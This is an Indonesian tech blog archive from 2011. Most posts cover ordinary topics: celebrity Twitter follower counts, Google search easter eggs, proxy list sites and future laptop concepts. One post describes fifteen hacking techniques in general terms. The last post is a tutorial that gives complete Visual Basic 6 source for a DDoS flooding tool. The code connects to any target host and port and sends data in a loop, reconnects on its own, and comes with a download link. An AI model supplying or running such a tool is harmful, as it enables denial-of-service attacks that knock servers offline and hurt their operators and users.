Matt Graves, juru bicara Twitter telah menginformasikan investasi yang dilakukan oleh pangeran Alwaleed. Namun demikian, ia tidak bersedia berkomentar lebih lanjut terkait pembelian saham perusahaannya itu.

Selebritis Indonesia Yang Memiliki Jutaan Followers

Penyanyi Agnes Monica tidak hanya sukses dalam karirnya sebagai penyanyi. Di dunia maya, terutama Twitter, mantan penyanyi cilik ini pun terbilang populer. Jika di awal Agustus lalu Agnes mencapai 1 juta follower, hanya dalam waktu kurang dari 5 bulan follower Agnes bertambah 1 juta, hingga akun Twitter Agnes kini menembus lebih dari 2 juta followers di akun @agnezmo ini.


Penyanyi yang kini membawakan lagu lawas "Rindu" milik Fryda ini sebenarnya bukan orang Indonesia dengan follower terbanyak. Twitter mencatat akun penyanyi Sherina Munaf (@sherinamunaf) sebagai selebriti Indonesia di Twitter dengan follower terbanyak, yaitu lebih dari 2,29 juta follower.

Tapi Agnes menjadi selebriti Indonesia pertama (dan baru satu-satunya) yang diberi tanda "verified account" oleh Twitter. Twitter menyebut, tanda "verified account" merupakan tanda khusus untuk menunjukkan keaslian akun selebriti atau tokoh dunia. Tapi tak semua orang bisa mendapatkan.

Hingga saat ini belum jelas kenapa baru Agnes yang mendapat tanda "verified account". Tampilnya Agnes di sejumlah ajang internasional, antara lain sebagai international red carpet host di American Music Awards 2010 dan nominasi 2011 MTV Europe Music Awards, tampaknya menjadi salah satu pertimbangan Twitter dalam memberikan tanda "verified account" itu.

Bukan hanya Agnes selebriti Indonesia dengan jutaan follower. Rekor follower terbanyak dari Indonesia masih dipegang oleh Sherina Munaf, lebih dari 2,29 juta follower. Sherina yang pertama kali dikenal lewat film "Petualangan Sherina" ini sendiri tercatat pertama kali menggunakan Twitter pada 21 April 2011.

Selain itu, tercatat juga akun penulis Raditya Dika (@radityadika) yang memiliki jutaan follower. Raditya yang kini menggeluti dunia Stand Up Comedy ini memulai Twitter pada 15 Juni 2009, dan sekarang memiliki lebih dari 1,5 juta follower.

Ada juga aktris cantik Luna Maya (@LunaMaya26). Mantan kekasih Ariel ini tercatat mulai menggunakan Twitter pada 2 April 2010, dan kini memiliki lebih dari 1,17 juta follower.
Menariknya, baik Agnes, Sherina, Raditya Dika, juga Luna Maya, menggunakan Twitter sebagai sarana interaksi dengan penggemarnya di dunia maya.

SaljuTurun Dari Pencarian Google

Bulan Desember adalah bulan dengan nuansa Natal. Dan fenomena ini tidak hanya terjadi didunia nyata, nuansa Natal pun juga dilakukan mesin pencari Google.


Setelah berkreasi berkreasi dengan doodle, Google pun kini menjadikan animasi dalam berkreasi. Cobalah sobat ketik kata "Let It Snow" (tanpa tanda kutip) di mesin pencari Google, dan tunggu kejutannya.

Tak hanya muncul hasil pencarian yang memperlihatkan video Dean Martin, Frank Sinatra, atau Kylie Minogue menyanyikan lagu "Let It Snow" di Youtube. Tetapi sobat akan melihat salju mulai turun di layar monitor sobat .

Perlahan, salju itu pun menutupi hasil pencarian. Tapi jangan khawatir, tekan tombol klik kiri di mouse sobat, kemudian gerakkan untuk menghapus salju itu, seperti
sobat menggunakan tangan sobat untuk mengelap kaca. Kata itu pun perlahan-lahan akan terlihat.

Atau jika
sobat tidak sabar, tinggal klik tombol "Defrost" di samping kanan mesin pencari. Setelah itu, salju pun hilang.

Tapi bukan hanya kata "Let It Snow"
(tanpa tanda kutip) yang menjadi kata kunci animasi Google. Jika sobat ketik kata "Hanukkah", maka sobat akan melihat dekorasi yang biasa muncul di hari raya Yahudi ini.

Atau, coba saja Anda ketik kata "Askew"
(tanpa tanda kutip). Hasilnya, maka tampilan mesin pencari Google akan miring. Karena "Askew" memang memiliki arti tidak dalam posisi rata.

Coba juga kata kunci lain "Do a barrel roll"
(tanpa tanda kutip) maka layar google sobat akan diputar balikkan 180 derajat

Ingin yang lebih rumit, coba ketik kata "Google Gravity" (tanpa tanda kutip), kemudian search dengan fitur "I'm Feeling Lucky". Hasilnya, kata Google dan kotak mesin pencarinya itu pun akan terjun bebas ke bagian bawah, seperti ditarik gravitasi bumi.

Silakan dicoba dari PC atau laptop, karena ini tidak berlaku di versi mobile.

Rabu, 14 Desember 2011

Daftar Situs Proxy List Yang Selalu Update

Saat ini sudah banyak bertebaran situs - situs yang menyediakan daftar list proxy secara gratis. Tapi kebanyakan jarang yang mengupdatenya. Sehingga banyak dijumpai proxy - proxy yang sudah mati.

Nah...jika sobat memerlukan daftar proxy - proxy yang selalu terupdate, berikut ini adalah situs - situs penyedia proxy yang sering saya pakai, yang selalu aktif melakukan update proxy


Ke 5 situs diatas adalah situs - situs favorit saya dalam mencari proxy. Saya juga menyediakan sebuah widget yang berisi daftar proxy yang selalu terupdate setiap menit. Sehingga akan lebih memudahkan sobat dalam mencari proxy secara cepat. Proxy yang disediakan adalah semua negara dan semua jenis proxy. Widget proxy bisa sobat temui pada sidebar disebelah

Selasa, 13 Desember 2011

15 Cara Hacker Menembus Suatu Situs

Jika kita mendengar kata - kata hacker pasti orang itu adalah orang yang sangat profesional dalam mengendalikan suatu komputer atau jaringan yang terhubung didalamnya. Tapi apakah sobat tahu, bagaimanakah caranya hacker itu bekerja agar bisa menyusup atau menembus suatu pertahanan dari situs target.


Berikut ini adalah cara - cara yang umum digunakan hacker untuk menyusup ke situs target :

1. IP Spoofing
IP Spoofing juga dikenal sebagai Source Address Spoofing, yaitu pemalsuan alamat IP attacker sehingga sasaran menganggap alamat IP attacker adalah alamat IP dari host di dalam network bukan dari luar network. Misalkan attacker mempunyai IP address type A 66.25.xx.xx ketika attacker melakukan serangan jenis ini maka Network yang diserang akan menganggap IP attacker adalah bagian dari Networknya misal 192.xx.xx.xx yaitu IP type C.

IP Spoofing terjadi ketika seorang attacker "mengakali" packet routing untuk mengubah arah dari data atau transmisi ke tujuan yang berbeda. Packet untuk routing biasanya di transmisikan secara transparan dan jelas sehingga membuat attacker dengan mudah untuk memodifikasi asal data ataupun tujuan dari data. Teknik ini bukan hanya dipakai oleh attacker tetapi juga dipakai oleh para security profesional untuk men tracing identitas dari para attacker

2. FTP Attack
Salah satu serangan yang dilakukan terhadap File Transfer Protocol adalah serangan buffer overflow yang diakibatkan oleh malformed command. tujuan menyerang FTP server ini rata-rata adalah untuk mendapatkan command shell ataupun untuk melakukan Denial Of Service. Serangan Denial Of Service akhirnya dapat menyebabkan seorang user atau attacker untuk mengambil resource didalam network tanpa adanya autorisasi, sedangkan command shell dapat membuat seorang attacker mendapatkan akses ke sistem server dan file-file data yang akhirnya seorang attacker bisa membuat anonymous root-acces yang mempunyai hak penuh terhadap system bahkan network yang diserang

3. Unix Finger Exploits
Pada masa awal internet, Unix OS finger utility digunakan secara efisien untuk men sharing informasi diantara pengguna. Karena permintaan informasi terhadap informasi finger ini tidak menyalahkan peraturan, kebanyakan system Administrator meninggalkan utility ini (finger) dengan keamanan yang sangat minim, bahkan tanpa kemanan sama sekali. Bagi seorang attacker utility ini sangat berharga untuk melakukan informasi tentang footprinting, termasuk nama login dan informasi contact.

Utility ini juga menyediakan keterangan yang sangat baik tentang aktivitas user didalam sistem, berapa lama user berada dalam sistem dan seberapa jauh user merawat sistem. Informasi yang dihasilkan dari finger ini dapat meminimalisasi usaha cracker dalam menembus sebuah sistem. Keterangan pribadi tentang user yang dimunculkan oleh finger daemon ini sudah cukup bagi seorang attacker untuk melakukan social engineering dengan menggunakan social skillnya untuk memanfaatkan user agar "memberitahu" password dan kode akses terhadap system.

4. Flooding Dan Broadcasting
Seorang attacker bisa mengurangi kecepatan network dan host-host yang berada di dalamnya secara significant dengan cara terus melakukan request/ permintaan terhadap suatu informasi dari sever yang bisa menangani serangan classic Denial Of Service (DoS), mengirim request ke satu port secara berlebihan dinamakan flooding, kadang hal ini juga disebut spraying. Tujuan dari kedua serangan ini adalah sama yaitu membuat network resource yang menyediakan informasi menjadi lemah dan akhirnya menyerah.

Serangan dengan cara Flooding bergantung kepada dua faktor yaitu: ukuran dan/atau volume (size and/or volume). Seorang attacker dapat menyebabkan Denial Of Service dengan cara melempar file berkapasitas besar atau volume yang besar dari paket yang kecil kepada sebuah system. Dalam keadaan seperti itu network server akan menghadapi kemacetan: terlalu banyak informasi yang diminta dan tidak cukup power untuk mendorong data agar berjalan. Pada dasarnya paket yang besar membutuhkan kapasitas proses yang besar pula, tetapi secara tidak normal paket yang kecil dan sama dalam volume yang besar akan menghabiskan resource secara percuma, dan mengakibatkan kemacetan

5. Fragmented Packet Attacks
Data-data internet yang di transmisikan melalui TCP/IP bisa dibagi lagi ke dalam paket-paket yang hanya mengandung paket pertama yang isinya berupa informasi bagian utama (header/ kepala) dari TCP. Beberapa firewall akan mengizinkan untuk memproses bagian dari paket-paket yang tidak mengandung informasi alamat asal pada paket pertamanya, hal ini akan mengakibatkan beberapa type system menjadi crash. Contohnya, server NT akan menjadi crash jika paket-paket yang dipecah (fragmented packet) cukup untuk menulis ulang informasi paket pertama dari suatu protokol

6. E-mail Exploits
Peng-exploitasian e-mail terjadi dalam lima bentuk yaitu: mail floods, manipulasi perintah (command manipulation), serangan tingkat transportasi(transport level attack), memasukkan berbagai macam kode (malicious code inserting) dan social engineering(memanfaatkan sosialisasi secara fisik). Penyerangan email bisa membuat system menjadi crash, membuka dan menulis ulang bahkan mengeksekusi file-file aplikasi atau juga membuat akses ke fungsi fungsi perintah (command function)

7. DNS Dan BIND Vulnerabilities
Berita baru-baru ini tentang kerawanan (vulnerabilities) tentang aplikasi Barkeley Internet Name Domain (BIND) dalam berbagai versi mengilustrasikan kerapuhan dari Domain Name System (DNS), yaitu krisis yang diarahkan pada operasi dasar dari Internet (basic internet operation)

8. Password Attacks
Password merupakan sesuatu yang umum jika kita bicara tentang keamanan. Kadang seorang user tidak peduli dengan nomor pin yang mereka miliki, seperti bertransaksi online di warnet, bahkan bertransaksi online dirumah pun sangat berbahaya jika tidak dilengkapi dengan software security seperti SSL dan PGP. Password adalah salah satu prosedur kemanan yang sangat sulit untuk diserang, seorang attacker mungkin saja mempunyai banyak tools (secara teknik maupun dalam kehidupan sosial) hanya untuk membuka sesuatu yang dilindungi oleh password.

Ketika seorang attacker berhasil mendapatkan password yang dimiliki oleh seorang user, maka ia akan mempunyai kekuasaan yang sama dengan user tersebut. Melatih karyawan/ user agar tetap waspada dalam menjaga passwordnya dari social engineering setidaknya dapat meminimalisir risiko, selain berjaga-jaga dari praktek social enginering organisasi pun harus mewaspadai hal ini dengan cara teknikal. Kebanyakan serangan yang dilakukan terhadap password adalah menebak (guessing), brute force, cracking dan sniffing

9.Proxy Server Attacks

Salah satu fungsi Proxy server adalah untuk mempercepat waktu response dengan cara menyatukan proses dari beberapa host dalam suatu trusted network

10. Remote Command Processing Attacks
Trusted Relationship antara dua atau lebih host Menyediakan fasilitas pertukaran informasi dan resource sharing. Sama halnya dengan proxy server, trusted relationship memberikan kepada semua anggota network kekuasaan akses yang sama di satu dan lain system (dalam network).

Attacker akan menyerang server yang merupakan anggota dari trusted system. Sama seperti kerawanan pada proxy server, ketika akses diterima, seorang attacker akan mempunyai kemampuan mengeksekusi perintah dan mengakses data yang tersedia bagi user lainnya

11. Remote File System Attack
Protokol-protokol untuk tranportasi data (tulang punggung dari internet) adalah tingkat TCP (TCP Level) yang mempunyai kemampuan dengan mekanisme untuk baca/tulis (read/write) Antara network dan host. Attacker bisa dengan mudah mendapatkan jejak informasi dari mekanisme ini untuk mendapatkan akses ke direktori file

12. Selective Program Insertions
Selective Program Insertions adalah serangan yang dilakukan ketika attacker menaruh program-program penghancur, seperti virus, worm dan trojan (mungkin istilah ini sudah anda kenal dengan baik ?) pada system sasaran. Program-program penghancur ini sering juga disebut malware. Program-program ini mempunyai kemampuan untuk merusak system, pemusnahan file, pencurian password sampai dengan membuka backdoor

13. Port Scanning
Melalui port scanning seorang attacker bisa melihat fungsi dan cara bertahan sebuah system dari berbagai macam port. Seorang atacker bisa mendapatkan akses kedalam sistem melalui port yang tidak dilindungi. Sebagai contoh, scaning bisa digunakan untuk menentukan dimana default SNMP string di buka untuk publik, yang artinya informasi bisa di extract untuk digunakan dalam remote command attack

14.TCP/IP Sequence Stealing, Passive Port Listening and Packet
Interception TCP/IP Sequence Stealing, Passive Port Listening dan Packet Interception berjalan untuk mengumpulkan informasi yang sensitif untuk mengakses network. Tidak seperti serangan aktif maupun brute-force, serangan yang menggunakan metode ini mempunyai lebih banyak kualitas stealth-like

15. HTTPD Attacks
Kerawanan yang terdapat dalam HTTPD ataupun webserver ada lima macam: buffer overflows, httpd bypasses, cross scripting, web code vulnerabilities, dan URL floods.

Konsep Desain Notebook Dan Netbook Masa Depan

Jika kita selalu mengikuti perkembangan tehnologi maka tidak akan pernah ada habisnya. Berbagai inovasi dari produk - produk baru selalu dikeluarkan. Saat ini bentuk dan jenis Notebook dan Netbook yang sobat temui masih berbentuk konvensional. Tapi bagaimanakah gambaran Notebook dan Netbook untuk masa depan. Berikut ini desain - desain yang sedang dikembangkan

1. ROLLTOP

Orkin Design telah memperkenalkan layar sentuh yang dinamakan Rolltop dan bisa digulung seperti gulungan koran ketika sobat pengen jalan - jalan. Rolltop juga bisa berfungsi sebagai layar monitor. Rolltop memiliki layar 13 inch ketika difungsikan sebagai laptop dan 17 inch ketika difungsikan sebagai monitor.

2. Nokia's Scroll OLED Laptop

Ini konsepnya juga sama seperti sebelumnya, menggunakan layar gulung. Namun laptop ini lebih difokuskan pada fungsi entertainment-nya oleh sang penemu, Rodrigo Mercado. Keunggulannya laptop ini ada pada tingkat kecerahan warna, sudut pandang yang lebar, rendah daya, dan high contrast ratio yang membuatnya sempurna untuk digunakan menonton film. Laptop ini juga menggunakan suara sebagai metode input perintah. 

3. iWeb  


Seiring berkurangnya ukuran layar laptop dan netbook, ukuran keyboard dan touchpad juga ikut - ikutan berkurang sehingga seringkali kita merasa perlu memakai wireless keyboard karena ukurannya sudah terlalu kecil untuk digunakan dengan nyaman. iWeb 2.0 dirancang oleh Yang Yongchang dan menyelesaikan masalah ukuran keyboard karena papan ketik di iWeb bisa dilipat jadi 3 dan sesuai untuk ukuran layarnya yang cuma 6.5 inch. Netbook ini juga mendukung multi-touch dan teknologi gravitasi serta fitur-fitur lain yang tidak biasa. 

4. Dell Eco-Friendly Root 
 

Belum jelas konsep ini diarahkan untuk menjadi laptop atau PC namun yang jelas, desainer Paulina Carlos melakukan langkah berani untuk memperkenalkan komputer tanpa monitor dan keyboard. Dengan menggunakan teknologi laser, layar dan keyboard mampu diproyeksikan ke permukaan yang rata. Keunggulan gadget ini ada pada materialnya yang ramah lingkungan (polymer) dan lapisan biologis serta komponen elektronik yang bisa didaur ulang. 

5. Laptop Transparan 


Layar ini menggunakan teknologi OLED dengan resolusi 'cuma' 960x540 dan memiliki tingkat transparansi 38% dan bisa menyulitkan mata sobat sekalian bila membaca teks/gambar dengan warna yang tidak kontras. 

6. Roteburu 

Roteburu adalah konsep inovatif yang berada di antara PC dan laptop. Bentuknya menyatu dengan meja dan menggunakan touch panel keyboard serta LCD berukuran 22 inch.

Nah...dari sekian desain laptop dan netbook, desain manakah yang sobat pilih ?

Membuat Sendiri DDoS Tool Dengan Visual Basic 6

Saat ini banyak bertebaran DDoS Tool yang bisa kita jumpai di dunia maya ini. DDoS ( Distributed Denial of Service ) adalah sebuah tipe serangan dari hacker yang sangat mematikan. Prinsip kerja dari DDoS adalah kita akan mengirimkan sejumlah perintah berulang ulang dalam waktu yang relatif cepat ke server target. Tujuan dari DDoS adalah dengan menghabiskan bandwith dari server target. Sehingga nantinya server akan mengalami kerusakan.


Untuk keterangan selanjutnya tentang DDoS silakan sobat googling saja. Dalam Visual Basic 6 kita bisa memanfaatkan kontrol winsock untuk membuat sendiri DDoS Tool yang sangat powerfull. Winsock adalah sebuah kontrol yang mampu masuk ke jaringan dengan melalui protokol yang sudah diatur. Untuk memulainya silakan ikuti langkah berikut :

1. Buka Visual Basic 6 sobat. Buat project baru, masukkan componen Microsoft Winsock Control
2. Masukkan coding berikut

Dim FILENAME As String, listItem As String

Private TransferRate As Single
Private TransferRate2 As Single
Private Xstart As Long
Private Ystart As Long
Private m_objIpHelper As CIpHelper

'Deklarasikan fungsi API untuk mengeksekusi suatu 'Hyperlink
Private Declare Function ShellExecute _
Lib "shell32.dll" Alias "ShellExecuteA" (ByVal hWnd _
As Long, ByVal lpOperation As String, ByVal lpFile _
As String, ByVal lpParameters As String, ByVal _
lpDirectory As String, ByVal nShowCmd As Long) As Long

Const SW_SHOWNORMAL = 1  'Konstanta untuk menampilkan 'jendela normal

Private Sub CMDMULAI_Click()
TXTURL.Text = Replace(TXTURL.Text, "http://", "")
Sock.Close
Sock.Connect TXTURL, TXTPORT
Timer1.Enabled = True
SIMPAN_PESAN
On Error Resume Next
Timer1.Interval = TXTWAKTU.Text
End Sub

Private Sub CMDSTOP_Click()
Sock.Close
Timer1.Enabled = False
lblStatus.Caption = "Putus"
lblStatus.ForeColor = &HFFFFFF
LBLWARN.Caption = "Menunggu perintah"
Timer2.Enabled = False
End Sub

Private Sub Form_Load()
Timer1.Interval = TXTWAKTU.Text
LOAD_PESAN
'Fungsi penggunaan badwith internet
Set m_objIpHelper = New CIpHelper
End Sub

Private Sub Form_MouseMove(Button As Integer, Shift As Integer, X As Single, Y As Single)
LBLSITUS.ForeColor = &HFFFF&
End Sub

Private Sub Form_Unload(Cancel As Integer)
Sock.Close
End
End Sub

Private Sub LBLSITUS_Click()
Dim situs As Long
  'Tampilkan program default untuk membuka situs ke
  'alamat lblSitus
  situs = ShellExecute(0, vbNullString, _
          LBLSITUS, "", "", vbNormalFocus)
  LBLSITUS.ForeColor = &H8000& 'Setelah diklik, berubah
                               'warna
End Sub

Private Sub LBLSITUS_MouseMove(Button As Integer, Shift As Integer, X As Single, Y As Single)
LBLSITUS.ForeColor = &HFF&
LBLSITUS.MousePointer = 2
End Sub

Private Sub MNUUP_Click()
FRMUP.Show
End Sub

Private Sub SocK_Close()
 lblStatus.Caption = "Putus"
End Sub

Private Sub SocK_Connect()
lblStatus.Caption = "Tersambung"
End Sub

Private Sub SocK_Error(ByVal Number As Integer, Description As String, ByVal Scode As Long, ByVal Source As String, ByVal HelpFile As String, ByVal HelpContext As Long, CancelDisplay As Boolean)
Sock.Close
lblStatus.Caption = "Soket error"
End Sub

Private Sub Timer1_Timer()
Dim DATA As String
DATA = TXTDATA.Text
If Sock.State = sckConnected Then
        Do
        On Error GoTo REMUK
        Sock.SendData DATA
      
        lblStatus = "Menyerang"
        lblStatus.ForeColor = &HFF00&
        LBLDATA.Caption = Sock.SocketHandle
        DoEvents
        lblSent.Caption = lblSent.Caption + 1
        Loop
REMUK:
        LBLWARN.Caption = "Koneksi putus. Mencoba koneksi kembali ..."
        Timer2.Enabled = True

Else
       
        CMDSTOP_Click
        Timer2.Enabled = True
        LBLWARN.Caption = "Koneksi putus. Mencoba koneksi kembali ..."
End If
End Sub

Private Sub Timer2_Timer()
LBLWARN.Caption = "Koneksi putus. Mencoba koneksi kembali ..."
If Timer2.Interval = 2000 Then
CMDMULAI_Click
Timer2.Enabled = False
LBLWARN.Caption = "Asyik ... terkoneksi lagi ... dech!!"
End If
End Sub

Private Sub tmrPoll_Timer()
tmrPoll.Enabled = False
  On Error GoTo ErrH
  Dim objInterface        As CInterface
  Static lngBytesRecv     As Long
  Static lngBytesSent     As Long
  Dim lIn As Long, lOut As Long
 
  Set objInterface = m_objIpHelper.Interfaces(1)
  lIn = m_objIpHelper.BytesReceived - lngBytesRecv - 3296
  lOut = m_objIpHelper.BytesSent - lngBytesSent - 3296
  If lIn < 0 Then lIn = 0
  If lOut < 0 Then lOut = 0
 
  LBLDOWNLOAD.Caption = "DL: " & GetTransferRate(lIn) & "/sec"
  LBLUPLOAD.Caption = "UL: " & GetTransferRate(lOut) & "/sec"
  picGraph.ScaleMode = 3
  DrawUsage picGraph, lIn, lOut
  lngBytesRecv = m_objIpHelper.BytesReceived
  lngBytesSent = m_objIpHelper.BytesSent
  DoEvents
  tmrPoll.Enabled = True
Exit Sub
ErrH:
  tmrPoll.Enabled = True
  Debug.Print Err.Description
End Sub

Function GetTransferRate(pDiff As Long) As String
  Dim d As Double
 
   d = pDiff / 1024
  If d < 1024 Then
    GetTransferRate = Trim(Format(d, "#,##0.00")) & " Kb"
    Exit Function
  End If
 
  ' Mbytes
  d = pDiff / 1024
  GetTransferRate = Trim(Format(d, "#,##0.00")) & " Mb"
End Function

Private Sub TXTPORT_KeyPress(KeyAscii As Integer)
If Not (KeyAscii >= Asc("0") & Chr(13) _
     And KeyAscii <= Asc("9") & Chr(13) _
     Or KeyAscii = vbKeyBack _
     Or KeyAscii = vbKeyDelete _
     Or KeyAscii = vbKeySpace) Then
        Beep
        KeyAscii = 0
   End If
End Sub

Private Sub TXTWAKTU_KeyPress(KeyAscii As Integer)
If Not (KeyAscii >= Asc("0") & Chr(13) _
     And KeyAscii <= Asc("9") & Chr(13) _
     Or KeyAscii = vbKeyBack _
     Or KeyAscii = vbKeyDelete _
     Or KeyAscii = vbKeySpace) Then
        Beep
        KeyAscii = 0
   End If
End Sub

Sub LOAD_PESAN()
FILENAME = App.Path & "/PESAN.txt"
TXTDATA.Text = ""

On Error Resume Next
Open FILENAME For Input As #1
    Do While Not EOF(1)
        Input #1 & vbNewLine, listItem
        'If Not (listItem = "") Then
            TXTDATA.Text = listItem
        'End If
    Loop
  
Close #1

End Sub

Sub SIMPAN_PESAN()
Open App.Path & "/PESAN.txt" For Output As #1
Print #1, TXTDATA.Text
Close
End Sub
 
3. Simpan dan jalankan project sobat.

Hati - hati dalam menggunakan tool ini. Gunakan secara bijak

Source Code DOWNDLOAD
Password : http://3hsoftcom.blogspot.com